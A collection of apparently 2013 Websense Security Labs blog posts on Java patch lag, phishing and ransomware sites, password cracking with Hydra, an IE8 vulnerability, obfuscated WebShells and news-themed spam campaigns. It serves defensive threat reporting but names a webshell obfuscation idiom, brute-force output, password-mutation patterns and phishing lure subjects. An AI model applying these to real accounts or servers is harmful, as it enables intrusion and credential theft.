Throughout the last 6 weeks, Websense® Security Labs™ has been collecting telemetry from our Websense ThreatSeeker® Intelligence Cloud to provide insight into usage of the most recent version of Java. Following our March 2013 study that looked at what versions of Java are being used, we saw that almost 93% of users are still not patched to the most recent version of Java. This leaves the majority of users still vulnerable to the dangers of exploit code already in use in the wild.

Since the April 16 Java Critical Patch Update was released by Oracle, we also noticed that businesses have been slow to apply the Version 7 Update 21 patch into their environment. Based on our analysis, we identified the following trends:

• 2 days after the release of the patch, less than 2% of users had adopted Java SE Version 7 Update 21.
• After a full week, the average adoption of the newest version of Java was at less than 3%.
• 2 weeks after the newest Java version was released, the trend line had moved to a little over 4%.
• One month after release, the number of live web requests using the most recent version of Java was only around 7%.

So 1 month after release, the remaining 92.8% of users remain vulnerable to at least one exploit in the wild. Remember that the April 2013 Java Critical Patch Update contained 42 new security fixes, of which 39 may be remotely exploitable without authentication. We saw that on April 20, 2013, to illustrate the danger of just one of these 39 remote execution vulnerabilities, Metasploit published a module to exploit a vulnerability in CVE-2013-2423.  We have observed this particular exploit code incorporated into exploit kits and used in the wild. Not only that, but we are also monitoring the possible impact of a recent vulnerability disclosure affecting the Java SE Version 7 Update 21 itself.

Our investigations further revealed that the busiest period of patch adoption was during the second week after release, and that adoption is continuing although at a slower rate. As news spreads of an available patch (via word of mouth or as the Java Auto Updater notifies users), we've noted that some organizations are then more willing to apply the patch.

Oracle is planning to release a Critical Patch Update for Java SE on June 18, 2013. Are you prepared for that?

If you are still in the 93% that have yet to apply the available patch, we, along with Oracle, strongly recommend that you consider applying it to your environment as soon as possible.

Acknowledgement: Thank you to Armin Buescher for his research.

At Websense® Security Labs™ we recently spotted an interesting case of a phishing domain related to the imminent release of the Apple iOS7 Operating System.  

As gossips circulate news in the wild about iOS7 after the D11 conference presented by Apple CEO Tim Cook, cybercriminals are setting up a foundation for phishing and malicious activities. The domain name was registered about 22 days ago (from the date of this analysis), as also reported by our ThreatSeeker® Intelligence Cloud:

At first glance, the host has no content other than an open directory, where we detected some interesting binary files:

While browsing through the content above, we opened the directory named "vl" and were immediately interested in the following result:

This is the control panel for the ransomware toolkit called "Silence Locker". In this case, we are viewing version 5, which is one of the latest released in 2013. As a ransomware toolkit, Silence Locker can generate a malicious file associated with familiar police enforcement pictures, based on the country of the potential victims. For example, in the following page the fake FBI Cyber Squad Investigation team is bound with a binary file that has been uploaded:

The other files hosted on the same directory are all detected by our ThreatSeeker Intelligence Cloud as follows:

After a brief analysis of the binaries above, we noticed that the AutoIT tool was used to package the malware. This conforms to the current trend of packaging malware to make detection more difficult. We continued our investigation by gathering some telemetry about the IP address that hosts this domain (ios7news.net). From what we discovered, it seems that this IP address is also used for other phishing domains, using the infrastructure below:

The domain "hxxp://gamingdaily.us" is most likely a phishing domain for a gaming news website that is also used to host  the exploit kit BleedingLife. Here are some details:

In the first row, it's easy to spot the URL parameters that provide a malicious PDF file that exploits one of the most often-used PDF vulnerabilities (CVE-2010-0188).

It's also possible to detect other vulnerabilities used by this exploit kit, just by looking into the content:

The two red boxes show the java script code used to provide the optimal exploit, based on the victim's system configuration. The list of CVEs used by this exploit kit is reported here.  For worldwide events, both IT news and rumors could be used by the attackers to leverage people's curiosity, as was done here.  In this case, we can suppose (due to details such as the open directory access) that the attackers are going to use and configure that domain for malicious activities based on ransomware. 

In the wake of recent account compromises, including Associated Press and the rampant breaches orchestrated by the "Syrian Electronic Army", Twitter have recently released 2FA (2 Factor Authentication), which is a most welcome addition to bolster users' security. It is not, however, the be-all and end-all: users are still responsible for choosing strong, hard-to-guess passwords. If your password is compromised, control of your account may be lost to malicious actors.

While it's true that, given enough time and resources, all passwords are crackable regardless of their complexity – a pass-string of 200 random characters is ultimately just as vulnerable to brute forcing as a password containing just one character – the aim of a complex pass-string  is to make an attack temporally infeasible. Let’s first take a look at the total number of possible combinations for a given base of elements:

This table encompasses repeating characters and is subject to lexicality (ordering).

Of course, the first row contains all possible words in the English language, up to 8 characters. This may seem an unattainable number of combinations, but with modern GPUs (Graphics Processing Units) able to calculate hashes at a rate of up to 772 MH/s (772 million hashes per second) , the first row would be exhausted in around 270 seconds, or about 4.5 minutes.

A user is unlikely to choose 8 arbitrary characters when creating a password that will be used on a daily basis; a typical string is likely to have some semantic content, such as a dictionary word (and various mutations thereof). Knowing this, crackers have produced many aids for this type of attack, including dictionary files and Rainbow tables – similar to dictionary files, but containing pre-computed hashes and the plaintext equivalent.

To give an example of how quickly weak passwords can be cracked, we set up a test using a simple Python script and Backtrack 5’s Hydra combined with a moderate GPU, and targeted a test SMTP account:

Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2013-05-23 07:08:12

……

login: ******   password: dave123

[VERBOSE] using SMTP LOGIN AUTH mechanism

1 of 1 target successfully completed, 1 valid password found

Hydra finished at 2013-05-23 07:08:51

<finished>

The password contained only 36 possible chars: lower case a-z & 0-9, and was cracked in 39 seconds.

While major sites will have (or should have) authentication attempt throttling, it’s not uncommon for minor sites to allow unlimited attempts to access an account, which, coupled with password reuse, is a huge problem.

Users I have spoken to told me they use different passwords for different sites in almost all cases. When quizzed further, I found they typically used the same base string with some simple mutations, for example:

password
Password
Passw0rd
passw0rd!1
pa$5w0rd!1

Knowing the base string, and with a very simple substitution (1337, symbols etc.) algorithm, we can crack these accounts in mere seconds. It’s trivial for an attacker to automate this process, meaning accounts on some forgotten, compromised server can be obtained, leading to accounts with the same user name being attacked and possibly compromised.

As Twitter will attest, using secure, hard to guess pass-strings and varying user names (not always possible)  are an absolute must for anybody who uses systems, applications, or sites accessible to others. Remember, it’s not just the internet that has people after your credentials; rogue employees and disgruntled exes, to name but two, are on the lookout for your details. 

To ensure accounts are as secure as possible, it’s advisable to:

1. Use strong, hard to guess, non-dictionary pass-strings. If the app doesn't allow you to use a mix of alphanumeric and special characters, you may not want the owner to have your details.
2. Never, ever reuse passwords. It’s also good practice to not reuse passwords with simple substitutions.
3. Ensure old accounts are deactivated where possible. Although you cannot trust a database would be purged of credentials, it’s certainly a start.
4. Think before signing up to a site or service; always read their security policy.
5. Be vigilant! Phishing is an easy-win for cyber criminals, so don’t give them an easy ride – sites and services will (or should) _never_ ask for your password via email.

Abiding by these rules will help make passwords as secure as they can be.

A new vulnerability found in Microsoft Internet Explorer affects Internet Explorer version 8.  The vulnerability allows attackers to execute code on a machine by just having the user visit a malicious website. This can happen, for example, when the user is tricked into clicking a link in an email or via compromised legitimate websites, such as the recently compromised Department of Labor website, which was subsequently used in a water hole attack. Malicious payloads delivered from this compromise were confirmed by Microsoft to exploit the new vulnerability, designated CVE-2013-1347.

The vulnerability itself lies in the way that Internet Explorer accesses an object that has been deleted or not properly allocated. This vulnerability has now been listed by Metasploit, which means it is available publicly, and we anticipate that we'll soon see this Internet Explorer vulnerability used in broader attacks.

More information about the vulnerability can be found in Microsoft Advisory 2847140.

How Does Websense Protect You?

Websense customers are protected with ACE™, our Advanced Classification Engine.

ACE is able to protect from all known samples (at a URL level and with real-time analytics).  We have also examined the sample code from Metasploit and added protection for that and any subsequent variations.

If we correlate this attack to the 7 Stages of Advanced Threats (as explained in our whitepaper), we currently have protection for:

• Stage 2 (Lure) - the website involved in the water hole attack
• Stage 3 (Redirect) - the websites that take the user to the delivery of the exploit code
• Stage 4 (Exploit Kit) - we have real-time detection of the exploit code
• Stage 6 (Call Home) - we offer protection from the websites used as a Command & Control
• Should the malware author's attack be sucessful, our customer's would be protected from Stage 7 (Data Theft) through the use of our data loss prevention tools.

As a member of the Microsoft Active Protection Program (MAPP), we are also working with Microsoft to monitor this situation.

[Update]

Thursday, May 9, 2013:

Microsoft have released a  "Fix it" solution for CVE-2013-1347), however keep in mind that a Fix it solution isn't going to be as strong as a full patch solution.

This blog describes briefly what WebShells are, and how attackers can use WebShells to gain powerful shell level/system level access to a server. WebShells have been used in attacks for quite a long time now, but with changes in attack trends, cyber criminals are getting more sophisticated with deployment techniques and methods to circumvent detection. With the help of our Websense® ThreatSeeker® Intelligence Cloud, we came across a few examples in which attackers have used different techniques.  These are elaborated on further in this blog.

Many mass compromises are accomplished in an automated fashion: vulnerabilities are enumerated, and after one is found, exploits are automatically deployed. The takeover process usually involves downloading a remote administration tool for the compromised website. One common tool deployed by attackers once they compromise a website is a WebShell.

The above diagram shows an attack where the attacker finds a vulnerability in a hosted web application and manages to upload a malicious application backdoor in one of the server supported languages.  This gives him control over the entire web server. 

What is a WebShell?

A WebShell is a script/code (written in scripting languages such as PHP, Perl, or Python) that runs on the system and can remotely administer a machine. Although WebShells are used as a Remote Administration Tool for many legitimate reasons, they can still be abused by malware authors to compromise websites.  Once the attacker gets a web server to execute the script, he gains shell-level access to the host operating system running with the same privileges as the web server. To avoid detection by firewalls or antivirus technologies, the attacker usually employs evasion techniques such as code obfuscation and encryption. To thwart this aspect of the WebShell's propagation, a full content inspection approach can reveal, and intercept, a wide variety of common obfuscation techniques and even decrypt the script to expose its real intent. Let's look at an example.

In the following example, we see a custom WebShell called "oRb". The actual WebShell body is obfuscated to avoid detection, using a preg_replace function with the "e" modifier.  Hex encoding has been used to conceal eval(gzinflate(base64_decode( . 

The URL that serves the WebShell further tries to confuse or mislead security tools by declaring in the header that the content type is an image file, as you can see below:

With its real-time scanning capability, Websense ACE™ (our Advanced Classification Engine) detects the obfuscation methods and techniques discussed above.

Let's now look at a second example to see the type of functionality that WebShells encompass. In this case we see a non-obfuscated version of "RC Shell v2.0",  which is similar to our previous example in that it also tries to hide as an image:

A working WebShell

Once the WebShell script is run, it provides a web interface for remote operations on the server, including, but not limited to:

• Server Information
• File manager (access to file system)
• Access to execute commands
• SQL manager
• PHP code execution
• Bruteforce FTP, MySQL, PgSQL
• Search files, search text in files
• Malicious content upload
• Mass code injection 

This animated image shows how it would look when run (click the image to open; the animation loops):

Websense ThreatSeeker Intelligence Cloud processes approximately up to 5 billion web requests per day, and out of those requests, just yesterday we found 1400 unique examples of threats using WebShells in different countries. Here is an example of how one obfuscated WebShell is spread around the globe.

How does Websense protect against WebShells?

The animated graphic above shows how powerful the access can be for an attacker.

ACE will block access to this malicious WebShell script/page if your end users locate such a script.  In addition to preventing access to the malicious WebShell script/page, we monitor outbound content to prevent sensitive data from leaving an organization via shell commands even if the abused channel is SSL-encrypted - which is a common advanced malware technique.  With the help of web telemetry we can generalize to the tune of 85,000,000+ compromised websites and thus learn from them, including what we have discussed here about WebShells.  Have a read of our Threat Report to find out more.

While the world recoils in shock at the horrifying events at Monday's Boston Marathon, cybercriminals are actively seeking to exploit people's thirst for information and eagerness to help those affected by the attacks.

The Websense ThreatSeeker® Intelligence Cloud is currently detecting and blocking multiple email-borne campaigns that attempt to lure unsuspecting recipients to malicious websites in order to exploit their machines for criminal gains.

Let's follow this campaign through the 7 Stages of Advanced Threats (as explained in our whitepaper) to see how cyber-criminals attempt to dupe and compromise users and their machines. We'll also show that breaking any one link in the chain can protect potential victims.

Stage 1: Reconnaissance

This campaign, like many other topical or event-based campaigns, attempts to propagate as widely as possible, rather than being directed at specific individuals or organizations. Given this, those behind the nefarious campaign simply have to identify a news story with global appeal (in this case, Monday's events), and then propagate their lure to as many people as possible.

Stage 2: Lure

Preying on human curiosity, in particular after a significant event, the lure is designed to get as many victims onto the hook as possible. In the email campaigns being monitored by Websense® Security Labs™, the email subjects have been designed to suggest that the message contains information or news regarding the events:

• 2 Explosions at Boston Marathon
• Aftermath to explosion at Boston Marathon
• Boston Explosion Caught on Video
• BREAKING - Boston Marathon Explosion
• Explosion at the Boston Marathon
• Explosions at Boston Marathon
• Explosions at the Boston Marathon
• Runner captures. Marathon Explosion
• Video of Explosion at the Boston Marathon

The message body itself, in most cases, contains a single URL in the format http://<IP Address>/news.html or http://<IP Address>/boston.html with no further detail or information. At this point, the recipient is lured to click on the malicious link, which ushers them on to stage 3.

Stage 3: Redirect

Having clicked the link, the unwitting victim is presented with a page containing YouTube videos of the horrific events (intentionally obscured below) while an iframe redirects them to an exploit page.

Stage 4 - Exploit Kit

Based on an analysis of a sample set of the malicious URLs seen in this campaign so far, the RedKit Exploit Kit has been used to, in our case, exploit an Oracle Java 7 Security Manager Bypass vulnerability (CVE-2013-0422) in order to deliver a file onto our analysis machine.

Stage 5 - Dropper File

Rather than using a dropper file, which contains the malicious code within itself and often packed to prevent detection by antivirus signatures, this campaign uses a downloader belonging to the Win32/Waledac family which is used to download further malicious binaries. In this case, two bots named Win32/Kelihos and Troj/Zbot are downloaded and installed on the compromised machine in order to join it to the cyber-criminals' bot network.

Stage 6 - Call Home / Stage 7 - Data Theft

Once the compromised machine is under the control of the cyber-criminal, the bots call home, which allows remote commands to be issued and for data to be sent and received. Common abuses of a compromised machine include data collection and exfiltration, such as the theft of financial and personal information. Other abuses include the sending of unsolicited email or the unwilling participation in Distributed Denial of Service attacks.

Websense customers are protected by ACE™, our Advanced Classification Engine, against cyber threats of this nature.  In addition to blocking lures at stage 2 before they reach end-users, access to malicious destinations throughout stages 3 through 6 are denied which, combined with data loss controls to protect against stage 7, help to ensure that your data stays where it belongs and not in the hands of an attacker.

Our thoughts are with the victims and their families at this time. While these cyber abuses are minor by comparison, users can help protect themselves by sourcing the news directly from reputable news agencies. Should you want to donate (be that blood to local hospitals or money to assisting organizations), be sure to visit official websites rather than following links that appear in your mailbox.

Thursday, April 18, 2013:

The campaign quickly evolved to match the latest news from the Texas fertilizer plant explosion.

The emails are similar, but use texas.html instead of boston.html path.

Subjects lines include:

• Texas Plant Explosion
• Raw: Texas Explosion Injures Dozens
• Texas Explosion Injures Dozens
• CAUGHT ON CAMERA: Fertilizer Plant Explosion
• Waco Explosion HD
• Video footage of Texas explosion
• Plant Explosion Near Waco, Texas
• West Tx Explosion

The lure pages have updated titles, but the rest is similar:

Websense Security Labs will continue to monitor this campaign.

The Websense® ThreatSeeker® Intelligence Cloud has detected that a DNS poisoning attack is happening in Kenya, with local big name websites in information technology targeted including Google, Bing, and LinkedIn. Although DNS records point to a page on behalf of the attackers that lets the browsing user know about the hack, it could easily be replaced with a malicious page at will.

Below is the snapshot in Websense ThreatSeeker Intelligence Cloud:

This is another attack issued by the so called Bangladeshi Hacker Group, the hacker group that has defaced 700,000 websites in the past and recently targeted prominent sites in Malawi (February 2013). In the Kenya campaign, from zone-h.com (a website tracking defaced websites), we could cross reference and confirm that the following well-known websites have been affected.

Websense customers are protected by our Advanced Classification Engine with real-time detection intelligence.

As the world remembers former British Prime Minister Margaret Thatcher, cyber attackers are participating too, but in their own tricky ways. Websense® Security Labs™ and the Websense ThreatSeeker® Intelligence Cloud have detected that attackers are sending malicious email spam with a topic referencing the death of Mrs. Thatcher. Actually, it is not new for an attacker to use a hot topic (like the death of Hugo Chavez) to spread malware. In this case, the lure email is very simple, with just a few words related to Mrs. Thatcher, but it pretends to be from your friends by using the "Re: Fwd:" notation. Internet-savvy customers will know that it looks suspicious and should not be tempted to click the link in the email.

When recipients click the malicious link, they are taken to a redirection page first, and then redirected to a Blackhole Exploit Kit landing page. The landing page detects the browser and plugin information in the client, and then serves the vulnerability file based on the plugin information. The final payload is a Cridex trojan, as seen in our ThreatScope™ report and in the VirusTotal report here.  Cridex is known in breaking CAPTCHA codes and you can see this trojan in action on our previous blog here.

Server-side polymorphic technology has been applied to evade traditional AV detection. 

It is not the first time we have seen the Blackhole malicious email campaign. It has evolved over time in combination with hot topics like the current crisis in Korea or major companies filing for bankruptcy. Please be careful about any email that contains 1 of  the following subjects:

Fwd: Dollar Bank bankruptcy

Re: Shedding light on 'dark matter'

Re: Why Washington is corrupt

Re: Kissinger: Thatcher's strong beliefs

Re: Tax havens busted

Fwd: Re: First Citizens Bank bankruptcy

Fwd: Re: Living large in Don Draper's New York

Fwd: Re: Kissinger: Thatcher's strong beliefs

Re: Fwd: California Bank & Trust bankruptcy

Fwd: Re: Bank of America bankruptcy

Fwd: Allowing knives on planes is 'insane'

Fwd: Re: War with N. Korea

Fwd: Air Canada goes 'Gangnam style'

Fwd: Re: NASA plans to catch an asteroid

Re: Fwd: Dollar Bank bankruptcy

Fwd: Why Washington is corrupt

Fwd: Blast kills 29 on bus in New-York

Fwd: Shedding light on 'dark matter'

Fwd: Re: Marikana massacre aftermath

Re: Fwd: Kissinger: Thatcher's strong beliefs

Fwd: Re: PNC Bank bankruptcy

Re: Fwd: Bank Of The West bankruptcy

Re: Fwd: M&I Bank bankruptcy

Re: Bank Of The West bankruptcy

Fwd: Bank Of The West bankruptcy

Re: Fwd: PNC Bank bankruptcy

Re: Bank of America bankruptcy

Re: Fwd: War with N. Korea

Re: California Bank & Trust bankruptcy

Re: Blast kills 29 on bus in New-York

Re: Fwd: Blast kills 29 on bus in New-York

Re: Sending out SOS for 'America's flagship'

Re: Fwd: Marikana massacre aftermath

Re: Living large in Don Draper's New York

Re: War with N. Korea

Fwd: Re: Death penalty 'harms Bali's reputation'

Re: Fwd: Death penalty 'harms Bali's reputation'

Re: PNC Bank bankruptcy

Re: NASA plans to catch an asteroid

Re: Northern Trust Bank bankruptcy

Fwd: Tax havens busted

Re: Fwd: Why Washington is corrupt

Re: Fwd: Tax havens busted

Fwd: M&I Bank bankruptcy

Re: Fwd: Fashion designer Lilly Pulitzer dies

Re: First Citizens Bank bankruptcy

Re: Fwd: Shedding light on 'dark matter'

Re: Fwd: Living large in Don Draper's New York

Re: Fwd: Northern Trust Bank bankruptcy

Fwd: Re: California Bank & Trust bankruptcy

Re: Air Canada goes 'Gangnam style'

Re: Fashion designer Lilly Pulitzer dies

Re: Dollar Bank bankruptcy

Fwd: Sending out SOS for 'America's flagship'

Websense technologies can protect customers in a multi-stage attack:

• Websense email security blocks the malicious email.
• Our Advanced Classification Engine (ACE™) detects the malicious content both in redirection and in the exploit page with real-time intelligence.
• Vunlerability files and the payload trojan are detected by Websense Gateway products.
• Websense technologies can identify malicious droppers both statically and behaviorally (via Websense ThreatScope).

Were you aware that Java is increasingly being viewed as a security risk? Of course you were — recent high-profile attacks have firmly established the trend, so we're not going to do yet another roundup here.

Instead, let's drill in and try to understand the core problem. With so many vulnerabilities, it's hard to keep browsers up to date with the latest patched versions — especially because Java is updated independently from the browser. How hard is it? We decided to check.

We recently added Java version detection to our Advanced Classification Engine (ACE™) and pumped it into the Websense ThreatSeeker® Intelligence Cloud to get real-time telemetry about which versions of Java are actively being used across tens of millions of endpoints. Here's what we found (you may need to click on the graph to see all the detail):

Figure 1: Global distribution of Java Runtime Environment versions based on active browser usage

As you can see, Java versions are all over the map. At the time of this writing, the latest Java Runtime Environment is 1.7.17, but only about five percent of the overall mix are using it. Most versions are months and even years out of date. How does this translate into the attack space?  

Exploit kits are a very common tool for distribution of many Java-based threats. From the billions of daily web requests being classified through our network, here is the breakdown of the active browser requests that are exploitable and which exploit kits have incorporated attacks for them.

Java Vulnerability  Vulnerable Versions**  Vulnerable   Exploit Kits With Live Exploits

CVE-2013-1493            1.7.15, 1.6.41                  93.77%         Cool 

CVE-2013-0431            1.7.11, 1.6.38                  83.87%         Cool

CVE-2012-5076            1.7.07, 1.6.35                  74.06%         Cool, Gong Da, MiniDuke

CVE-2012-4681            1.7.06, 1.6.34                  71.54%         Blackhole 2.0, RedKit, CritXPack, Gong Da

CVE-2012-1723            1.7.04, 1.6.32                  67.72%         Blackhole 2.0, RedKit, CritXPack, Gong Da

CVE-2012-0507            1.7.02, 1.6.30                  59.51%         Cool, Blackhole 2.0, RedKit, CritXPack, Gong Da

** All prior JRE versions below those listed are also vulnerable

It is probably no surprise that the largest single exploited vulnerability is the most recent one, with a vulnerable population of browsers at 93.77%. That's what the bad guys do — examine your security controls and find the easiest way to bypass them. Grabbing a copy of the latest version of Cool and using a pre-packaged exploit is a pretty low bar to go after such a large population of vulnerable browsers. Most browsers are vulnerable to a much broader array of well-known Java holes, with over 75% using versions that are at least six months old, nearly two-thirds being more than a year out of date, and more than 50% of browsers are greater than two years behind the times with respect to Java vulnerabilities. And don't forget that if you're not on version 7 (which is 78.86% of you), Oracle won't be sending you any more updates even if new vulnerabilities are uncovered.

How do you stop the onslaught if the patches aren't keeping up? Given the complexity and dynamism of exploit kits and their updates, exploit signatures do not suffice. Our protection model against new Java exploits is to use our analytics and real-time telemetry to proactively intercept new instances at every step of their attack strategy. Most prominently, ACE covers the exploit kit/exploit phase with a fine-grained knowledge of the expressible threats from all of the major kits, including not just the vulnerabilities, but also the obfuscation techniques, redirection techniques, and re-packaging of their dropper files. Here are just a few other ways we interrupt the malware kill chain to make it harder for the bad guys to drive right through this sizable hole in current IT infrastructure:

• Real-time intelligence to block lures, phishing, and other forms of social engineering coming across web, email, and mobile platforms
• Real-time inbound intelligence to identify known or suspicious malware destinations and compromised sites 
• Real-time outbound intelligence to identify command and control communication, bot networks, dynamic DNS requests, and fingerprinted data headed to the wrong people or places
• Identifying malicious droppers both statically and behaviorally (via Websense ThreatScope™) 

It's clearly not just the zero-day attacks that should be getting all of the attention.

We returned from CeBIT, one of the largest and most influential technology conferences in the world, last week.

The lead theme at this year's conference was that of "Shareconomy", finding benefit in exchanging ideas and information.  As a security lab, we embrace the idea of the Shareconomy and have a tremendous amount of threat intelligence to contribute. 

Websense Security Labs were an active participant in the show throughout the week.  In case you missed it here is how we got involved:

Speakers Corner

We delivered a presentation introducing results from a recent independent security test which highlighted security effectiveness across the kill chain.  You can download the test report from our website.  The "7 Stages of Advanced Threats" are explained here.  

SpeakUp Live

Our usual interactive discussion session format went on the road at CeBIT as we opened up the topic of securing mobile devices in the workplace.

Audience participation (via a remote voting system) drove the conversation into areas of:

• How do I secure my data on employee-owned smartphones?
• Do I feel protected from the risks brought about by Bring Your Own Device (BYOD)?
• What do I perceive to be the biggest risks in regards to BYOD?

The majority of attendees at our CeBIT discussion (65%) felt that they were not adequately protected from the many risks associated with BYOD.  Specifically, 46% of attendees were equally concerned about the risks from malicious mobile applications and lost devices, and the issue of securing their private data from data theft.

We look forward to seeing you and collaborating at future security conferences around the globe.